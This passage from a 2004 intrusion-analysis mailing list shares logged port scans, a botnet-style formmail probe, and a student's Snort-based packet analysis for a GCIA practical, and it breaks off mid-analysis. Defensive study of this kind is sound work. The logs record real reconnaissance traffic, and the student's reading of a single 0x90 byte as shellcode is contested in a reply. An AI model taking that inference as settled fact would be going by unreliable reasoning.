Jul 11 08:55:54 219.35.68.196:22002 -> xxx.yyy.32.255:3128 SYN ******S*
12056

Jul 11 00:56:06 221.216.97.86:3865 -> xxx.yyy.71.164:5554 SYN ******S*
Jul 11 00:56:07 221.216.97.86:4477 -> xxx.yyy.71.164:1023 SYN ******S*
Jul 11 00:56:09 221.216.97.86:1720 -> xxx.yyy.71.164:9898 SYN ******S*
Jul 11 00:56:06 221.216.97.86:3866 -> xxx.yyy.71.165:5554 SYN ******S*
Jul 11 00:56:07 221.216.97.86:4478 -> xxx.yyy.71.165:1023 SYN ******S*
Jul 11 00:56:09 221.216.97.86:1721 -> xxx.yyy.71.165:9898 SYN ******S*
Jul 11 00:56:06 221.216.97.86:3867 -> xxx.yyy.71.166:5554 SYN ******S*
Jul 11 00:56:07 221.216.97.86:4486 -> xxx.yyy.71.166:1023 SYN ******S*
[...]
Jul 11 00:56:55 221.216.97.86:1241 -> xxx.yyy.92.12:9898 SYN ******S*
Jul 11 00:56:55 221.216.97.86:1250 -> xxx.yyy.92.21:9898 SYN ******S*
Jul 11 00:56:55 221.216.97.86:1251 -> xxx.yyy.92.22:9898 SYN ******S*
Jul 11 00:56:55 221.216.97.86:1271 -> xxx.yyy.92.24:9898 SYN ******S*
Jul 11 00:56:55 221.216.97.86:1270 -> xxx.yyy.92.23:9898 SYN ******S*
Jul 11 00:56:55 221.216.97.86:1257 -> xxx.yyy.92.26:9898 SYN ******S*
Jul 11 00:56:55 221.216.97.86:1292 -> xxx.yyy.92.16:9898 SYN ******S*
Jul 11 00:56:55 221.216.97.86:1289 -> xxx.yyy.92.17:9898 SYN ******S*
11452

Jul 11 00:56:07 61.55.15.54:2873 -> xxx.yyy.133.14:5554 SYN ******S*
Jul 11 00:56:08 61.55.15.54:3674 -> xxx.yyy.133.14:1023 SYN ******S*
Jul 11 00:56:09 61.55.15.54:1380 -> xxx.yyy.133.14:9898 SYN ******S*
Jul 11 00:56:07 61.55.15.54:2876 -> xxx.yyy.133.17:5554 SYN ******S*
Jul 11 00:56:08 61.55.15.54:3677 -> xxx.yyy.133.17:1023 SYN ******S*
Jul 11 00:56:09 61.55.15.54:1383 -> xxx.yyy.133.17:9898 SYN ******S*
Jul 11 00:56:07 61.55.15.54:2877 -> xxx.yyy.133.18:5554 SYN ******S*
Jul 11 00:56:08 61.55.15.54:3678 -> xxx.yyy.133.18:1023 SYN ******S*
[...]
Jul 11 00:56:50 61.55.15.54:4230 -> xxx.yyy.134.187:9898 SYN ******S*
Jul 11 00:56:50 61.55.15.54:4245 -> xxx.yyy.134.192:9898 SYN ******S*
Jul 11 00:56:50 61.55.15.54:4321 -> xxx.yyy.134.199:9898 SYN ******S*
Jul 11 00:56:50 61.55.15.54:4342 -> xxx.yyy.134.201:9898 SYN ******S*
Jul 11 00:56:50 61.55.15.54:4343 -> xxx.yyy.134.191:9898 SYN ******S*
Jul 11 00:56:50 61.55.15.54:4340 -> xxx.yyy.134.204:9898 SYN ******S*
Jul 11 00:56:50 61.55.15.54:4341 -> xxx.yyy.134.206:9898 SYN ******S*
Jul 11 00:56:50 61.55.15.54:4345 -> xxx.yyy.134.196:9898 SYN ******S*
Jul 11 00:56:50 61.55.15.54:4344 -> xxx.yyy.134.197:9898 SYN ******S*
11208

Jul 11 23:55:02 221.189.43.16:4339 -> xxx.yyy.236.79:5554 SYN ******S*
Jul 11 23:55:02 221.189.43.16:4408 -> xxx.yyy.236.115:5554 SYN ******S*
Jul 11 23:55:03 221.189.43.16:4395 -> xxx.yyy.236.102:5554 SYN ******S*
Jul 11 23:55:03 221.189.43.16:4400 -> xxx.yyy.236.107:5554 SYN ******S*
Jul 11 23:55:03 221.189.43.16:4389 -> xxx.yyy.236.96:5554 SYN ******S*
Jul 11 23:55:03 221.189.43.16:4345 -> xxx.yyy.236.84:5554 SYN ******S*
Jul 11 23:55:03 221.189.43.16:4352 -> xxx.yyy.236.91:5554 SYN ******S*
Jul 11 23:55:03 221.189.43.16:4418 -> xxx.yyy.236.125:5554 SYN ******S*
[...]
Jul 11 23:55:48 221.189.43.16:1235 -> xxx.yyy.255.237:9898 SYN ******S*
Jul 11 23:55:48 221.189.43.16:1231 -> xxx.yyy.255.233:9898 SYN ******S*
Jul 11 23:55:48 221.189.43.16:1236 -> xxx.yyy.255.238:9898 SYN ******S*
Jul 11 23:55:48 221.189.43.16:1232 -> xxx.yyy.255.234:9898 SYN ******S*
Jul 11 23:55:48 221.189.43.16:1237 -> xxx.yyy.255.239:9898 SYN ******S*
Jul 11 23:55:48 221.189.43.16:1238 -> xxx.yyy.255.240:9898 SYN ******S*
Jul 11 23:55:48 221.189.43.16:1241 -> xxx.yyy.255.243:9898 SYN ******S*
Jul 11 23:55:48 221.189.43.16:1242 -> xxx.yyy.255.244:9898 SYN ******S*
Jul 11 23:55:49 221.189.43.16:1239 -> xxx.yyy.255.241:9898 SYN ******S*
10532

Jul 11 23:56:23 221.153.138.201:2870 -> xxx.yyy.194.125:5554 SYN ******S*
Jul 11 23:56:24 221.153.138.201:3680 -> xxx.yyy.194.125:1023 SYN ******S*
Jul 11 23:56:26 221.153.138.201:1745 -> xxx.yyy.194.125:9898 SYN ******S*
Jul 11 23:56:23 221.153.138.201:2887 -> xxx.yyy.194.124:5554 SYN ******S*
Jul 11 23:56:24 221.153.138.201:3698 -> xxx.yyy.194.124:1023 SYN ******S*
Jul 11 23:56:26 221.153.138.201:1771 -> xxx.yyy.194.124:9898 SYN ******S*
Jul 11 23:56:23 221.153.138.201:2922 -> xxx.yyy.194.128:5554 SYN ******S*
Jul 11 23:56:23 221.153.138.201:2947 -> xxx.yyy.194.130:5554 SYN ******S*
[...]
Jul 11 23:57:07 221.153.138.201:2112 -> xxx.yyy.214.183:9898 SYN ******S*
Jul 11 23:57:07 221.153.138.201:2161 -> xxx.yyy.214.192:9898 SYN ******S*
Jul 11 23:57:07 221.153.138.201:2165 -> xxx.yyy.214.193:9898 SYN ******S*
Jul 11 23:57:07 221.153.138.201:2227 -> xxx.yyy.214.204:9898 SYN ******S*
Jul 11 23:57:08 221.153.138.201:2228 -> xxx.yyy.214.205:9898 SYN ******S*
Jul 11 23:57:08 221.153.138.201:2341 -> xxx.yyy.214.217:9898 SYN ******S*
Jul 11 23:57:08 221.153.138.201:2342 -> xxx.yyy.214.218:9898 SYN ******S*
Jul 11 23:57:08 221.153.138.201:2464 -> xxx.yyy.214.244:9898 SYN ******S*
Jul 11 23:57:08 221.153.138.201:2460 -> xxx.yyy.214.234:9898 SYN ******S*
10510

Jul 11 00:56:34 221.218.42.124:1047 -> xxx.yyy.195.88:5554 SYN ******S*
Jul 11 00:56:35 221.218.42.124:1586 -> xxx.yyy.195.88:1023 SYN ******S*
Jul 11 00:56:34 221.218.42.124:1073 -> xxx.yyy.195.91:5554 SYN ******S*
Jul 11 00:56:35 221.218.42.124:1604 -> xxx.yyy.195.91:1023 SYN ******S*
Jul 11 00:56:34 221.218.42.124:1072 -> xxx.yyy.195.90:5554 SYN ******S*
Jul 11 00:56:35 221.218.42.124:1603 -> xxx.yyy.195.90:1023 SYN ******S*
Jul 11 00:56:34 221.218.42.124:1110 -> xxx.yyy.195.92:5554 SYN ******S*
Jul 11 00:56:36 221.218.42.124:1614 -> xxx.yyy.195.92:1023 SYN ******S*
[...]
Jul 11 00:57:21 221.218.42.124:2970 -> xxx.yyy.215.63:9898 SYN ******S*
Jul 11 00:57:21 221.218.42.124:2966 -> xxx.yyy.215.59:9898 SYN ******S*
Jul 11 00:57:21 221.218.42.124:2968 -> xxx.yyy.215.61:9898 SYN ******S*
Jul 11 00:57:21 221.218.42.124:2972 -> xxx.yyy.215.74:9898 SYN ******S*
Jul 11 00:57:22 221.218.42.124:3524 -> xxx.yyy.215.208:9898 SYN ******S*
Jul 11 00:57:22 221.218.42.124:3545 -> xxx.yyy.215.207:9898 SYN ******S*
Jul 11 00:57:22 221.218.42.124:3543 -> xxx.yyy.215.202:9898 SYN ******S*
Jul 11 00:57:22 221.218.42.124:3544 -> xxx.yyy.215.206:9898 SYN ******S*
9973

Jul 11 00:56:59 218.24.75.56:3762 -> xxx.yyy.134.104:1023 SYN ******S*
Jul 11 00:56:59 218.24.75.56:3763 -> xxx.yyy.134.102:1023 SYN ******S*
Jul 11 00:56:59 218.24.75.56:3764 -> xxx.yyy.134.101:1023 SYN ******S*
Jul 11 00:56:59 218.24.75.56:3765 -> xxx.yyy.134.100:1023 SYN ******S*
Jul 11 00:57:01 218.24.75.56:1388 -> xxx.yyy.134.100:9898 SYN ******S*
Jul 11 00:56:59 218.24.75.56:3767 -> xxx.yyy.134.98:1023 SYN ******S*
Jul 11 00:57:01 218.24.75.56:1391 -> xxx.yyy.134.98:9898 SYN ******S*
Jul 11 00:56:59 218.24.75.56:3768 -> xxx.yyy.134.96:1023 SYN ******S*
[...]
Jul 11 00:57:40 218.24.75.56:3703 -> xxx.yyy.154.60:9898 SYN ******S*
Jul 11 00:57:40 218.24.75.56:3704 -> xxx.yyy.154.61:9898 SYN ******S*
Jul 11 00:57:40 218.24.75.56:3706 -> xxx.yyy.154.63:9898 SYN ******S*
Jul 11 00:57:40 218.24.75.56:3707 -> xxx.yyy.154.64:9898 SYN ******S*
Jul 11 00:57:40 218.24.75.56:3705 -> xxx.yyy.154.62:9898 SYN ******S*
Jul 11 00:57:40 218.24.75.56:3708 -> xxx.yyy.154.65:9898 SYN ******S*
Jul 11 00:57:40 218.24.75.56:3709 -> xxx.yyy.154.66:9898 SYN ******S*
Jul 11 00:57:40 218.24.75.56:3743 -> xxx.yyy.154.90:9898 SYN ******S*
Jul 11 00:57:40 218.24.75.56:3750 -> xxx.yyy.154.97:9898 SYN ******S*
9779

Jul 11 22:39:28 221.192.211.170:4916 -> xxx.yyy.72.124:5554 SYN ******S*
Jul 11 22:39:28 221.192.211.170:4919 -> xxx.yyy.72.125:5554 SYN ******S*
Jul 11 22:39:31 221.192.211.170:2480 -> xxx.yyy.72.125:9898 SYN ******S*
Jul 11 22:39:28 221.192.211.170:4928 -> xxx.yyy.72.126:5554 SYN ******S*
Jul 11 22:39:29 221.192.211.170:1500 -> xxx.yyy.72.126:1023 SYN ******S*
Jul 11 22:39:31 221.192.211.170:2502 -> xxx.yyy.72.126:9898 SYN ******S*
Jul 11 22:39:28 221.192.211.170:4932 -> xxx.yyy.72.129:5554 SYN ******S*
Jul 11 22:39:28 221.192.211.170:4931 -> xxx.yyy.72.127:5554 SYN ******S*
[...]
Jul 11 22:40:11 221.192.211.170:2693 -> xxx.yyy.92.216:9898 SYN ******S*
Jul 11 22:40:11 221.192.211.170:2702 -> xxx.yyy.92.220:9898 SYN ******S*
Jul 11 22:40:11 221.192.211.170:2709 -> xxx.yyy.92.227:9898 SYN ******S*
Jul 11 22:40:11 221.192.211.170:2724 -> xxx.yyy.92.233:9898 SYN ******S*
Jul 11 22:40:11 221.192.211.170:2748 -> xxx.yyy.92.235:9898 SYN ******S*
Jul 11 22:40:11 221.192.211.170:2753 -> xxx.yyy.92.237:9898 SYN ******S*
Jul 11 22:40:11 221.192.211.170:2755 -> xxx.yyy.92.239:9898 SYN ******S*
Jul 11 22:40:11 221.192.211.170:2754 -> xxx.yyy.92.238:9898 SYN ******S*
8274

Jul 11 00:56:18 218.11.229.179:3579 -> xxx.yyy.195.89:5554 SYN ******S*
Jul 11 00:56:19 218.11.229.179:4326 -> xxx.yyy.195.89:1023 SYN ******S*
Jul 11 00:56:21 218.11.229.179:1586 -> xxx.yyy.195.89:9898 SYN ******S*
Jul 11 00:56:18 218.11.229.179:3582 -> xxx.yyy.195.92:5554 SYN ******S*
Jul 11 00:56:19 218.11.229.179:4329 -> xxx.yyy.195.92:1023 SYN ******S*
Jul 11 00:56:21 218.11.229.179:1589 -> xxx.yyy.195.92:9898 SYN ******S*
Jul 11 00:56:18 218.11.229.179:3578 -> xxx.yyy.195.88:5554 SYN ******S*
Jul 11 00:56:19 218.11.229.179:4325 -> xxx.yyy.195.88:1023 SYN ******S*
[...]
Jul 11 00:56:57 218.11.229.179:3535 -> xxx.yyy.214.181:9898 SYN ******S*
Jul 11 00:56:57 218.11.229.179:3531 -> xxx.yyy.214.177:9898 SYN ******S*
Jul 11 00:56:57 218.11.229.179:3536 -> xxx.yyy.214.182:9898 SYN ******S*
Jul 11 00:56:57 218.11.229.179:3568 -> xxx.yyy.214.214:9898 SYN ******S*
Jul 11 00:56:58 218.11.229.179:3606 -> xxx.yyy.214.252:9898 SYN ******S*
Jul 11 00:56:58 218.11.229.179:3605 -> xxx.yyy.214.251:9898 SYN ******S*
Jul 11 00:56:58 218.11.229.179:3607 -> xxx.yyy.214.253:9898 SYN ******S*
Jul 11 00:56:58 218.11.229.179:3609 -> xxx.yyy.214.255:9898 SYN ******S*
8191

-- 
- Ken
===========================================================================
Ken Connelly (KC152)
Systems and Operations Manager, ITS - Network Services
University of Northern Iowa
Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu
phone: (319) 273-5850
fax: (319) 273-7373

From mozrat at gmail.com Mon Jul 12 14:22:08 2004
From: mozrat at gmail.com (Simon Morris)
Date: Mon, 12 Jul 2004 15:22:08 +0100
Subject: [Intrusions] Vulnerabilities with Lotus Domino Products
In-Reply-To: 
References: 
Message-ID: 

Hello list.

I hope this is the right place to ask this kind of question.

I need to research the implications of exposing an internal Domino 6.x server to the Internet on port 80, and possibly 1352 (Lotus Notes protocol).

Does anyone have any recollection of past vulnerabilities on these ports with Domino?

Thanks in advance
~SM

From EBeaudoin at investpsp.ca Mon Jul 12 15:51:06 2004
From: EBeaudoin at investpsp.ca (Eric Beaudoin)
Date: Mon, 12 Jul 2004 11:51:06 -0400
Subject: [Intrusions] Vulnerabilities with Lotus Domino Products
Message-ID: <7156EB36CF1B4140937A7690E2A6DDDF8D4D55@mail.investpsp.ca>

Try . That should get you started (for the past vulnerabilities part).

Hope that helps.
Éric Beaudoin
Senior Advisor, Infrastructure & Security
(514) 938-7540

From list.account at cerdant.com Mon Jul 12 16:10:20 2004
From: list.account at cerdant.com (List Account)
Date: Mon, 12 Jul 2004 12:10:20 -0400
Subject: [Intrusions] Vulnerabilities with Lotus Domino Products
In-Reply-To: 
Message-ID: <0bf701c4682a$bcff0040$2d6ea8c0@ngxp>

Can you forward me any private replies you get? I have a customer running Domino on the net and am curious what you find.

Thanks,
Nathan
Thanks in advance
~SM

From rimshot at pandora.be Mon Jul 12 17:29:35 2004
From: rimshot at pandora.be (Wouter Clarie)
Date: Mon, 12 Jul 2004 19:29:35 +0200 (CEST)
Subject: [Intrusions] Vulnerabilities with Lotus Domino Products

Hi Simon,

On Mon, 12 Jul 2004, Simon Morris wrote:

> I need to research the implications of exposing an internal Domino 6.x
> server to the Internet on port 80, and possibly 1352 (Lotus Notes
> protocol)
>
> Does anyone have any recollection of past vulnerabilities on these ports
> with Domino.

You can look these things up in the database of SecurityFocus at:
http://www.securityfocus.com/bid/vendor/
or in the CVE dictionary at:
http://www.cve.mitre.org/cgi-bin/cvekey.cgi?keyword=domino

Regards,
Wouter

From sekure at gmail.com Mon Jul 12 18:55:18 2004
From: sekure at gmail.com (sekure)
Date: Mon, 12 Jul 2004 14:55:18 -0400
Subject: [Intrusions] Distributed scan
Message-ID: <1639ada004071211555fc7bb3e@mail.gmail.com>

Looking over some log files, check out this distributed scan I got hit with over the weekend. Snort caught most of it; the rest I had to fish out of httpd logs. I count 10 different sources, all connecting to my server within 30 seconds, making similar requests...
My guess: this is someone utilizing a botnet to do distributed scans.

212.174.111.110 - - [10/Jul/2004:20:07:02 -0400] "POST /cgi-bin/sendform.cgi HTTP/1.0" 404 5540
200.62.136.145 - - [10/Jul/2004:20:07:03 -0400] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 5540
148.244.150.52 - - [10/Jul/2004:20:07:04 -0400] "POST /cgi-bin/contact.cgi HTTP/1.0" 404 5540
209.184.108.162 - - [10/Jul/2004:20:07:08 -0400] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 5540
209.26.56.10 - - [10/Jul/2004:20:07:16 -0400] "POST /cgi-bin/formmail.cgi HTTP/1.0" 404 5540
213.149.103.76 - - [10/Jul/2004:20:07:18 -0400] "POST /cgi-bin/FormMail.pl HTTP/1.0" 404 5540
80.65.103.231 - - [10/Jul/2004:20:07:19 -0400] "POST /mail.cgi HTTP/1.0" 404 5540
207.248.159.253 - - [10/Jul/2004:20:07:23 -0400] "POST /cgi-bin/fmail.pl HTTP/1.0" 404 5540
66.68.229.28 - - [10/Jul/2004:20:07:32 -0400] "POST /cgi-bin/form.cgi HTTP/1.1" 404 5540
80.65.103.231 - - [10/Jul/2004:20:07:33 -0400] "POST /cgi-bin/contact.pl HTTP/1.0" 404 5540
207.156.61.10 - - [10/Jul/2004:20:07:34 -0400] "POST /cgi/formmail HTTP/1.0" 404 5540

From mohankc_2002 at yahoo.com Mon Jul 12 20:27:17 2004
From: mohankc_2002 at yahoo.com (Mohan Chirumamilla)
Date: Mon, 12 Jul 2004 13:27:17 -0700 (PDT)
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect VilaipornTaweelappontong
Message-ID: <20040712202717.68779.qmail@web20228.mail.yahoo.com>

> It's obvious that host 192.168.17.68 is a web server
> and it's IIS. The data field displayed in hex above is
> '90' (NOP bytes usually used by shellcode) which seems
> like someone is trying a buffer overflow on the web
> server.

What makes you think that the attacker did not craft his packets with these "characteristics"?

----- Original Message -----
From: "Vilaiporn Taweelappontong"
Sent: Saturday, July 10, 2004 9:30 PM
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect VilaipornTaweelappontong

> Dear all
>
> This is a second attempt to post the assignment.
> I would really appreciate it if someone could give me comments on my analysis.
>
> Thank you very much in advance and regards,
> Vilaiporn
>
> 1. Source of trace
>
> Source of trace was file 2003.12.15.6 downloaded from www.incidents.org/log.
>
> Statistics (from Ethereal):
> File length: 3000044
> Format: libpcap
> Start time: 2:07:16.936242
> End time: 2:08:17.518422
> Elapsed time between first and last packet: 60.582 seconds
> Packet count: 36672
> Snapshot length: 96
>
> I used the Statistics function of Ethereal to summarize a list of IP addresses and MAC addresses in the file, and I looked up the vendor of each Ethernet MAC address at http://www.coffer.com/mac_find/. Below is an architecture based on my understanding:
>
> 10.10.10.165 (00:03:47:8c:89:c2 Intel machine) ---> 3COM (00:01:02:79:91:ed) ---> Sniffer ----> Firewall ---> 192.168.17.68 (00:50:56:40:00:6D VMWARE)
>
> Observation:
> The file date and the timestamps reported are different. The file name indicates that the data should be from 2003/12/15, but the date specified in all packets actually indicates packets generated on 2003/11/19. I understand that some technique was used to obfuscate the information, such as modifying IP addresses, as the checksums of all packets are correct. Or no obfuscation has been done.
>
> 2. Detect was generated by
>
> The file is stored in tcpdump binary format. The detect presented in this assignment was generated by Snort version 2.1.1, which I ran on my Windows 2000 Server machine. I ran Snort in NIDS mode with the standard Snort ruleset downloaded on 2 May 2004. All rules files were enabled.
> Command that was used:
>
> C:\snort\bin\snort -r 2003.12.5.6 -c c:\snort\etc\snort.conf -l ex1 -X -d -A full
>
> -r 2003.12.5.6             read source file 2003.12.5.6
> -c c:\snort\etc\snort.conf run against the configuration file snort.conf
> -l ex1                     log the output files (alert file and log file) in the ex1 folder
> -X                         dump the raw packet data starting at the link layer (in this case, this is the Ethernet header)
> -d                         dump the application layer (dump the packet payloads with the packet headers)
> -A full                    display text alerts with full packet headers
>
> The selected alert result is as follows:
>
> [**] (http_inspect) BARE BYTE UNICODE ENCODING [**]
> 11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80
> TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF
> ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20
>
> The Snort rule that triggered the 'Bare Byte Unicode Encoding' alert was the http_inspect preprocessor configuration. [1] Preprocessors take the decoded packets from the Snort packet decoder and can examine or manipulate them before they are handed to the detection engine.
>
> preprocessor stream4_reassemble
>
> preprocessor http_inspect: global \
>     iis_unicode_map unicode.map 1252
>
> preprocessor http_inspect_server: server default \
>     profile all ports { 80 8080 8180 } \
>     oversize_dir_length 500
>
> Note that profile all includes 'bare byte decoding' enabled. The following configuration was displayed when I ran Snort (without the quiet option enabled). You can see that the bare byte option was set to YES.
>
> HttpInspect Config:
>   GLOBAL CONFIG
>     Max Pipeline Requests: 0
>     Inspection Type: STATELESS
>     Detect Proxy Usage: NO
>     IIS Unicode Map Filename: c:\snort\etc\unicode.map
>     IIS Unicode Map Codepage: 1252
>   DEFAULT SERVER CONFIG:
>     Ports: 80 8080 8180
>     Flow Depth: 300
>     Max Chunk Length: 500000
>     Inspect Pipeline Requests: YES
>     URI Discovery Strict Mode: NO
>     Allow Proxy Usage: NO
>     Disable Alerting: YES
>     Oversize Dir Length: 500
>     Only inspect URI: NO
>     Ascii: YES alert: NO
>     Double Decoding: YES alert: YES
>     %U Encoding: YES alert: YES
>     Bare Byte: YES alert: YES
>     Base36: OFF
>     UTF 8: OFF
>     IIS Unicode: YES alert: YES
>     Multiple Slash: YES alert: NO
>     IIS Backslash: YES alert: NO
>     Directory: YES alert: NO
>     Apache WhiteSpace: YES alert: YES
>     IIS Delimiter: YES alert: YES
>     IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG
>     Non-RFC Compliant Characters: NONE
>
> To look into the packet in detail, I used windump to print the packet in hex format:
>
> C:\windump>windump -r 2003.12.15.6 -x -vv -n "dst host 192.168.17.68 and port 80"
>
> 02:08:04.823979 IP (tos 0x0, ttl 128, id 42592, len 41) 10.10.10.165.1085 > 192.168.17.68.80: . [tcp sum ok] 3841034003:3841034004(1) ack 380024539 win 17520 (DF)
>     4500 0029 a660 4000 8006 6dd3 0a0a 0aa5
>     c0a8 1144 043d 0050 e4f1 8713 16a6 b6db
>     5010 4470 b6b3 0000 9000 0000 0000
>
> It's obvious that host 192.168.17.68 is a web server and it's IIS. The data field displayed in hex above is '90' (NOP bytes usually used by shellcode), which seems like someone is trying a buffer overflow on the web server.
>
> Let's also look at other packets associated with host 192.168.17.68 for a better analysis.
>
> C:\Snort\log\old>snort -r 2003.12.15.6 -v -q "host 192.168.17.68"
>
> 11/19-02:07:48.841453 10.10.10.165:1691 -> 192.168.17.68:1080
> TCP TTL:128 TOS:0x0 ID:41554 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:07:51.828714 10.10.10.165:1691 -> 192.168.17.68:1080
> TCP TTL:128 TOS:0x0 ID:41720 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:07:57.968183 10.10.10.165:1691 -> 192.168.17.68:1080
> TCP TTL:128 TOS:0x0 ID:42089 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:07:59.094302 10.10.10.165:1703 -> 192.168.17.68:1080
> TCP TTL:128 TOS:0x0 ID:42248 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:08:02.163499 10.10.10.165:1703 -> 192.168.17.68:1080
> TCP TTL:128 TOS:0x0 ID:42416 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80
> TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF
> ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:08:08.302980 10.10.10.165:1703 -> 192.168.17.68:1080
> TCP TTL:128 TOS:0x0 ID:42605 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:08:09.095015 10.10.10.165:1711 -> 192.168.17.68:1080
> TCP TTL:128 TOS:0x0 ID:42615 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:08:12.089067 10.10.10.165:1711 -> 192.168.17.68:1080
> TCP TTL:128 TOS:0x0 ID:42647 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> Run time for packet processing was 0.750000 seconds
>
> The above information is still not enough to analyse the intruder's attempt, so I merged all the log files into one with the following command:
>
> C:> mergecap -w merge 2003.12.15.1 2003.12.15.2 2003.12.15.3 2003.12.15.4 2003.12.15.5 2003.12.15.6 2003.12.15.7 2003.12.15.8 2003.12.15.9 2003.12.15.10 2003.12.15.11 2003.12.15.12 2003.12.15.13 2003.12.15.14
>
> Then I ran Snort again with the same set of rules.
> Some of the results that I got are shown below:
>
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:05:05.114599 10.10.10.165:2695 -> 192.168.17.68:1
> TCP TTL:128 TOS:0x0 ID:21572 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x8158842 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:05:05.115021 10.10.10.165:2696 -> 192.168.17.68:2
> TCP TTL:128 TOS:0x0 ID:21573 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x816111F Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:05:05.116627 10.10.10.165:2697 -> 192.168.17.68:3
> TCP TTL:128 TOS:0x0 ID:21574 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x816B61C Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:05:05.117195 10.10.10.165:2698 -> 192.168.17.68:4
> TCP TTL:128 TOS:0x0 ID:21575 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x817B1FC Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> 11/19-02:05:05.117646 10.10.10.165:2699 -> 192.168.17.68:5
> TCP TTL:128 TOS:0x0 ID:21576 IpLen:20 DgmLen:48 DF
> ******S* Seq: 0x81865D4 Ack: 0x0 Win: 0x4000 TcpLen: 28
> TCP Options (4) => MSS: 1460 NOP NOP SackOK
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> The above are just sample packets. We can tell from the generated packets that the attacker did a TCP port scan and a UDP port scan to identify the open ports of host 192.168.17.68. Once port 80 was found running, the attacker knew that this is a web server. So the attacker was trying to scan the server with, probably, web server scanning tools.
>
> 3. Probability the source address was spoofed
>
> An HTTP session requires a complete 3-way handshake. This packet, however, did not complete the handshake, so it is unlikely that the source IP would be spoofed.
>
> 4. Description of attack
>
